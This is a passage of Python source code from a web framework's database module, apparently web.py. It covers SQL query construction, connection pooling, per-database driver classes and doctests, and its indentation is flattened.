self._unload_context(self._ctx)
def rollback():
# do db rollback and release the connection if pooling is enabled.
ctx.db.rollback()
if self.has_pooling:
self._unload_context(self._ctx)
ctx.commit = commit
ctx.rollback = rollback
def _unload_context(self, ctx):
del ctx.db
def _connect(self, keywords):
return self.db_module.connect(**keywords)
def _connect_with_pooling(self, keywords):
def get_pooled_db():
from DBUtils import PooledDB
# In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
# see Bug#122112
if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
else:
return PooledDB.PooledDB(creator=self.db_module, **keywords)
if getattr(self, '_pooleddb', None) is None:
self._pooleddb = get_pooled_db()
return self._pooleddb.connection()
def _db_cursor(self):
return self.ctx.db.cursor()
def _param_marker(self):
"""Returns parameter marker based on paramstyle attribute if this database."""
style = getattr(self, 'paramstyle', 'pyformat')
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(style)
def _db_execute(self, cur, sql_query):
"""executes an sql query"""
self.ctx.dbq_count += 1
try:
a = time.time()
query, params = self._process_query(sql_query)
out = cur.execute(query, params)
b = time.time()
except:
if self.printing:
print('ERR:', str(sql_query), file=debug)
if self.ctx.transactions:
self.ctx.transactions[-1].rollback()
else:
self.ctx.rollback()
raise
if self.printing:
print('%s (%s): %s' % (round(b-a, 2), self.ctx.dbq_count, str(sql_query)), file=debug)
return out
def _process_query(self, sql_query):
"""Takes the SQLQuery object and returns query string and parameters.
"""
paramstyle = getattr(self, 'paramstyle', 'pyformat')
query = sql_query.query(paramstyle)
params = sql_query.values()
return query, params
def _where(self, where, vars):
if isinstance(where, numeric_types):
where = "id = " + sqlparam(where)
#@@@ for backward-compatibility
elif isinstance(where, (list, tuple)) and len(where) == 2:
where = SQLQuery(where[0], where[1])
elif isinstance(where, dict):
where = self._where_dict(where)
elif isinstance(where, SQLQuery):
pass
else:
where = reparam(where, vars)
return where
def _where_dict(self, where):
where_clauses = []
for k, v in sorted(iteritems(where), key= lambda t:t[0]):
where_clauses.append(k + ' = ' + sqlquote(v))
if where_clauses:
return SQLQuery.join(where_clauses, " AND ")
else:
return None
def query(self, sql_query, vars=None, processed=False, _test=False):
"""
Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
If `processed=True`, `vars` is a `reparam`-style list to use
instead of interpolating.
>>> db = DB(None, {})
>>> db.query("SELECT * FROM foo", _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.query("SELECT * FROM foo WHERE x = $x", vars=dict(x='f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
>>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
"""
if vars is None: vars = {}
if not processed and not isinstance(sql_query, SQLQuery):
sql_query = reparam(sql_query, vars)
if _test: return sql_query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, sql_query)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = iterbetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [storage(dict(zip(names, x))) \
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not self.ctx.transactions:
self.ctx.commit()
return out
def select(self, tables, vars=None, what='*', where=None, order=None, group=None,
limit=None, offset=None, _test=False):
"""
Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset`. Uses vars to interpolate.
Otherwise, each clause can be a SQLQuery.
>>> db = DB(None, {})
>>> db.select('foo', _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
<sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
>>> db.select('foo', where={'id': 5}, _test=True)
<sql: 'SELECT * FROM foo WHERE id = 5'>
"""
if vars is None: vars = {}
sql_clauses = self.sql_clauses(what, tables, where, group, order, limit, offset)
clauses = [self.gen_clause(sql, val, vars) for sql, val in sql_clauses if val is not None]
qout = SQLQuery.join(clauses)
if _test: return qout
return self.query(qout, processed=True)
def where(self, table, what='*', order=None, group=None, limit=None,
offset=None, _test=False, **kwargs):
"""
Selects from `table` where keys are equal to values in `kwargs`.
>>> db = DB(None, {})
>>> db.where('foo', bar_id=3, _test=True)
<sql: 'SELECT * FROM foo WHERE bar_id = 3'>
>>> db.where('foo', source=2, crust='dewey', _test=True)
<sql: "SELECT * FROM foo WHERE crust = 'dewey' AND source = 2">
>>> db.where('foo', _test=True)
<sql: 'SELECT * FROM foo'>
"""
where = self._where_dict(kwargs)
return self.select(table, what=what, order=order,
group=group, limit=limit, offset=offset, _test=_test,
where=where)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset))
def gen_clause(self, sql, val, vars):
if isinstance(val, numeric_types):
if sql == 'WHERE':
nout = 'id = ' + sqlquote(val)
else:
nout = SQLQuery(val)
#@@@
elif isinstance(val, (list, tuple)) and len(val) == 2:
nout = SQLQuery(val[0], val[1]) # backwards-compatibility
elif sql == 'WHERE' and isinstance(val, dict):
nout = self._where_dict(val)
elif isinstance(val, SQLQuery):
nout = val
else:
nout = reparam(val, vars)
def xjoin(a, b):
if a and b: return a + ' ' + b
else: return a or b
return xjoin(sql, nout)
def insert(self, tablename, seqname=None, _test=False, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
>>> q
<sql: "INSERT INTO foo (age, created, name) VALUES (2, NOW(), 'bob')">
>>> q.query()
'INSERT INTO foo (age, created, name) VALUES (%s, NOW(), %s)'
>>> q.values()
[2, 'bob']
"""
def q(x): return "(" + x + ")"
if values:
#needed for Py3 compatibility with the above doctests
sorted_values = sorted(values.items(), key=lambda t: t[0])
_keys = SQLQuery.join(map(lambda t: t[0], sorted_values), ', ')
_values = SQLQuery.join([sqlparam(v) for v in map(lambda t: t[1], sorted_values)], ', ')
sql_query = "INSERT INTO %s " % tablename + q(_keys) + ' VALUES ' + q(_values)
else:
sql_query = SQLQuery(self._get_insert_default_values_query(tablename))
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s DEFAULT VALUES" % table
def multiple_insert(self, tablename, values, seqname=None, _test=False):
"""
Inserts multiple rows into `tablename`. The `values` must be a list of dictioanries,
one for each row to be inserted, each with the same set of keys.
Returns the list of ids of the inserted rows.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> db.supports_multiple_insert = True
>>> values = [{"name": "foo", "email": "foo@example.com"}, {"name": "bar", "email": "bar@example.com"}]
>>> db.multiple_insert('person', values=values, _test=True)
<sql: "INSERT INTO person (email, name) VALUES ('foo@example.com', 'foo'), ('bar@example.com', 'bar')">
"""
if not values:
return []
if not self.supports_multiple_insert:
out = [self.insert(tablename, seqname=seqname, _test=_test, **v) for v in values]
if seqname is False:
return None
else:
return out
keys = values[0].keys()
#@@ make sure all keys are valid
for v in values:
if v.keys() != keys:
raise ValueError('Not all rows have the same keys')
keys = sorted(keys) #enforce query order for the above doctest compatibility with Py3
sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (tablename, ', '.join(keys)))
for i, row in enumerate(values):
if i != 0:
sql_query.append(", ")
SQLQuery.join([SQLParam(row[k]) for k in keys], sep=", ", target=sql_query, prefix="(", suffix=")")
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
out = range(out-len(values)+1, out+1)
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def update(self, tables, where, vars=None, _test=False, **values):
"""
Update `tables` with clause `where` (interpolated using `vars`)
and setting `values`.
>>> db = DB(None, {})
>>> name = 'Joseph'
>>> q = db.update('foo', where='name = $name', name='bob', age=2,
... created=SQLLiteral('NOW()'), vars=locals(), _test=True)
>>> q
<sql: "UPDATE foo SET age = 2, created = NOW(), name = 'bob' WHERE name = 'Joseph'">
>>> q.query()
'UPDATE foo SET age = %s, created = NOW(), name = %s WHERE name = %s'
>>> q.values()
[2, 'bob', 'Joseph']
"""
if vars is None: vars = {}
where = self._where(where, vars)
values = sorted(values.items(), key=lambda t: t[0])
query = (
"UPDATE " + sqllist(tables) +
" SET " + sqlwhere(values, ', ') +
" WHERE " + where)
if _test: return query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, query)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def delete(self, table, where, using=None, vars=None, _test=False):
"""
Deletes from `table` with clauses `where` and `using`.
>>> db = DB(None, {})
>>> name = 'Joe'
>>> db.delete('foo', where='name = $name', vars=locals(), _test=True)
<sql: "DELETE FROM foo WHERE name = 'Joe'">
"""
if vars is None: vars = {}
where = self._where(where, vars)
q = 'DELETE FROM ' + table
if using: q += ' USING ' + sqllist(using)
if where: q += ' WHERE ' + where
if _test: return q
db_cursor = self._db_cursor()
self._db_execute(db_cursor, q)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def _process_insert_query(self, query, tablename, seqname):
return query
def transaction(self):
"""Start a transaction."""
return Transaction(self.ctx)
class PostgresDB(DB):
"""Postgres driver."""
def __init__(self, **keywords):
if 'pw' in keywords:
keywords['password'] = keywords.pop('pw')
db_module = import_driver(["psycopg2", "psycopg", "pgdb"], preferred=keywords.pop('driver', None))
if db_module.__name__ == "psycopg2":
import psycopg2.extensions
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
if db_module.__name__ == "pgdb" and 'port' in keywords:
keywords["host"] += ":" + str(keywords.pop('port'))
# if db is not provided postgres driver will take it from PGDATABASE environment variable
if 'db' in keywords:
keywords['database'] = keywords.pop('db')
self.dbname = "postgres"
self.paramstyle = db_module.paramstyle
DB.__init__(self, db_module, keywords)
self.supports_multiple_insert = True
self._sequences = None
def _process_insert_query(self, query, tablename, seqname):
if seqname is None:
# when seqname is not provided guess the seqname and make sure it exists
seqname = tablename + "_id_seq"
if seqname not in self._get_all_sequences():
seqname = None
if seqname:
query += "; SELECT currval('%s')" % seqname
return query
def _get_all_sequences(self):
"""Query postgres to find names of all sequences used in this database."""
if self._sequences is None:
q = "SELECT c.relname FROM pg_class c WHERE c.relkind = 'S'"
self._sequences = set([c.relname for c in self.query(q)])
return self._sequences
def _connect(self, keywords):
conn = DB._connect(self, keywords)
try:
conn.set_client_encoding('UTF8')
except AttributeError:
# fallback for pgdb driver
conn.cursor().execute("set client_encoding to 'UTF-8'")
return conn
def _connect_with_pooling(self, keywords):
conn = DB._connect_with_pooling(self, keywords)
conn._con._con.set_client_encoding('UTF8')
return conn
class MySQLDB(DB):
def __init__(self, **keywords):
import MySQLdb as db
if 'pw' in keywords:
keywords['passwd'] = keywords['pw']
del keywords['pw']
if 'charset' not in keywords:
keywords['charset'] = 'utf8'
elif keywords['charset'] is None:
del keywords['charset']
self.paramstyle = db.paramstyle = 'pyformat' # it's both, like psycopg
self.dbname = "mysql"
DB.__init__(self, db, keywords)
self.supports_multiple_insert = True
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_id();')
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
"""Import the first available driver or preferred driver.
"""
if preferred:
drivers = [preferred]
for d in drivers:
try:
return __import__(d, None, None, ['x'])
except ImportError:
pass
raise ImportError("Unable to import " + " or ".join(drivers))
class SqliteDB(DB):
def __init__(self, **keywords):
db = import_driver(["sqlite3", "pysqlite2.dbapi2", "sqlite"], preferred=keywords.pop('driver', None))
if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
db.paramstyle = 'qmark'
# sqlite driver doesn't create datatime objects for timestamp columns unless `detect_types` option is passed.
# It seems to be supported in sqlite3 and pysqlite2 drivers, not surte about sqlite.
keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
self.paramstyle = db.paramstyle
keywords['database'] = keywords.pop('db')
keywords['pooling'] = False # sqlite don't allows connections to be shared by threads
self.dbname = "sqlite"
DB.__init__(self, db, keywords)
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_rowid();')
def query(self, *a, **kw):
out = DB.query(self, *a, **kw)
if isinstance(out, iterbetter):
del out.__len__
return out
class FirebirdDB(DB):
"""Firebird Database.
"""
def __init__(self, **keywords):
try:
import kinterbasdb as db
except Exception:
db = None
pass
if 'pw' in keywords:
keywords['password'] = keywords.pop('pw')
keywords['database'] = keywords.pop('db')
self.paramstyle = db.paramstyle
DB.__init__(self, db, keywords)
def delete(self, table, where=None, using=None, vars=None, _test=False):
# firebird doesn't support using clause
using=None
return DB.delete(self, table, where, using, vars, _test)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', ''),
('FIRST', limit),
('SKIP', offset),
('', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order)
)
class MSSQLDB(DB):
def __init__(self, **keywords):
import pymssql as db
if 'pw' in keywords:
keywords['password'] = keywords.pop('pw')
keywords['database'] = keywords.pop('db')
self.dbname = "mssql"
DB.__init__(self, db, keywords)
def _process_query(self, sql_query):
"""Takes the SQLQuery object and returns query string and parameters.
"""
# MSSQLDB expects params to be a tuple.
# Overwriting the default implementation to convert params to tuple.
paramstyle = getattr(self, 'paramstyle', 'pyformat')
query = sql_query.query(paramstyle)
params = sql_query.values()
return query, tuple(params)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', what),
('TOP', limit),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('OFFSET', offset))
def _test(self):
"""Test LIMIT.
Fake presence of pymssql module for running tests.
>>> import sys
>>> sys.modules['pymssql'] = sys.modules['sys']
MSSQL has TOP clause instead of LIMIT clause.
>>> db = MSSQLDB(db='test', user='joe', pw='secret')
>>> db.select('foo', limit=4, _test=True)
<sql: 'SELECT * TOP 4 FROM foo'>
"""
pass
class OracleDB(DB):
def __init__(self, **keywords):
import cx_Oracle as db
if 'pw' in keywords:
keywords['password'] = keywords.pop('pw')
#@@ TODO: use db.makedsn if host, port is specified
keywords['dsn'] = keywords.pop('db')
self.dbname = 'oracle'
db.paramstyle = 'numeric'
self.paramstyle = db.paramstyle
# oracle doesn't support pooling
keywords.pop('pooling', None)
DB.__init__(self, db, keywords)
def _process_insert_query(self, query, tablename, seqname):
if seqname is None:
# It is not possible to get seq name from table name in Oracle
return query
else:
return query + "; SELECT %s.currval FROM dual" % seqname
def dburl2dict(url):
"""
Takes a URL to a database and parses it into an equivalent dictionary.
>>> dburl2dict('postgres:///mygreatdb') == {'pw': None, 'dbn': 'postgres', 'db': 'mygreatdb', 'host': None, 'user': None, 'port': None}
True
>>> dburl2dict('postgres://james:day@serverfarm.example.net:5432/mygreatdb') == {'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': 5432}
True
>>> dburl2dict('postgres://james:day@serverfarm.example.net/mygreatdb') == {'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
True
>>> dburl2dict('postgres://james:d%40y@serverfarm.example.net/mygreatdb') == {'pw': 'd@y', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
True
>>> dburl2dict('mysql://james:d%40y@serverfarm.example.net/mygreatdb') == {'pw': 'd@y', 'dbn': 'mysql', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
True
"""
parts = urlparse.urlparse(unquote(url))
return {'dbn': parts.scheme,
'user': parts.username,
'pw': parts.password,
'db': parts.path[1:],
'host': parts.hostname,
'port': parts.port}
_databases = {}
def database(dburl=None, **params):
"""Creates appropriate database using params.
Pooling will be enabled if DBUtils module is available.
Pooling can be disabled by passing pooling=False in params.
"""
if not dburl and not params:
dburl = os.environ['DATABASE_URL']
if dburl:
params = dburl2dict(dburl)
dbn = params.pop('dbn')
if dbn in _databases:
return _databases[dbn](**params)
else:
raise UnknownDB(dbn)
def register_database(name, clazz):
"""
Register a database.
>>> class LegacyDB(DB):
... def __init__(self, **params):
... pass
...
>>> register_database('legacy', LegacyDB)
>>> db = database(dbn='legacy', db='test', user='joe', passwd='secret')
"""
_databases[name] = clazz
register_database('mysql', MySQLDB)
register_database('postgres', PostgresDB)
register_database('sqlite', SqliteDB)
register_database('firebird', FirebirdDB)
register_database('mssql', MSSQLDB)
register_database('oracle', OracleDB)
def _interpolate(format):
"""
Takes a format string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
def matchorfail(text, pos):
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
chunks = []
pos = 0
while 1:
dollar = format.find("$", pos)
if dollar < 0:
break
nextchar = format[dollar + 1]
if nextchar == "{":
chunks.append((0, format[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format[pos:dollar]))
match, pos = matchorfail(format, dollar + 1)
while pos < len(format):
if format[pos] == "." and \
pos + 1 < len(format) and format[pos + 1] in namechars:
match, pos = matchorfail(format, pos + 1)
elif format[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format[dollar + 1:pos]))
else:
chunks.append((0, format[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format):
chunks.append((0, format[pos:]))
return chunks
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"China_Aisa@live.com"
] | China_Aisa@live.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.